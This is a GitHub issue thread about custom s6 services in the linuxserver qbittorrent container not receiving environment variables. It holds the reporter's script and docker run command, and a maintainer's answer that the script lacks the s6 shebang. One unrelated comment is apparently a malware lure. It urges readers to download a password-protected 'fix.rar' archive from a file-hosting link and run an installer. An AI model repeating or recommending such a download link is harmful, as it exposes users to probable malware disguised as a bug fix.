### ISSUE TITLE
[BUG] container does not pass the envirnoment  to custom servcices 

### ISSUE THREAD

**Issue by moralrebuild** [linuxserver/docker-qbittorrent#319]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

custom scripts have no issue to pick up the environment variable but the custom services.

for e.g. adding a custom service in the container like:
```
pre_reqs() {
while read -r var; do
    [ -z "${!var}" ] && { echo "$(timestamp) | ${var} is empty or not set."; exit 1; }
done << EOF
QBITTORRENT_SERVER
QBITTORRENT_PORT
QBITTORRENT_USER
QBITTORRENT_PASS
VPN_GATEWAY
VPN_IF_NAME
CHECK_INTERVAL
NAT_LEASE_LIFETIME
EOF

return 0
}
```

### Steps To Reproduce

see above

### Environment

```markdown
- OS:
- How docker service was installed:
```

### CPU architecture

x86-64

### Docker creation

```bash
docker run -d \
  --name=qbittorrent \
  --network=container:wireguard \
  -e PUID=1000 \
  -e PGID=1000 \
  -e UMASK=002 \
  -e TZ=America/Los_Angeles \
  -e WEBUI_PORT=8080 \
  -e QBITTORRENT_SERVER=10.2.0.2 \
  -e QBITTORRENT_PORT=8080 \
  -e QBITTORRENT_USER=<user> \
  -e QBITTORRENT_PASS=<pass> \
  -e VPN_GATEWAY=10.2.0.1 \
  -e VPN_IF_NAME=wg0 \
  -e CHECK_INTERVAL=45 \
  -e NAT_LEASE_LIFETIME=120 \
  -v /dockers/qbittorrent/config:/config \
  -v /dockers/qbittorrent/custom-services.d:/custom-services.d:ro \
  --restart unless-stopped \
  lscr.io/linuxserver/qbittorrent:latest
```

### Container logs

```bash
the container logs say:

2024-08-26T21:28:22.837454559Z  2024-08-26 21:28:22 | QBITTORRENT_SERVER is empty or not set.
```
```

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Roxedus** [comment]
Is that the whole script? You need the shebang. https://github.com/linuxserver/docker-qbittorrent/blob/master/root/etc/s6-overlay/s6-rc.d/svc-qbittorrent/run#L1

**Comment by moralrebuild** [comment]
Thanks you for your great help! I didn't realize that it needs a special interpreter rather than a regular shell.
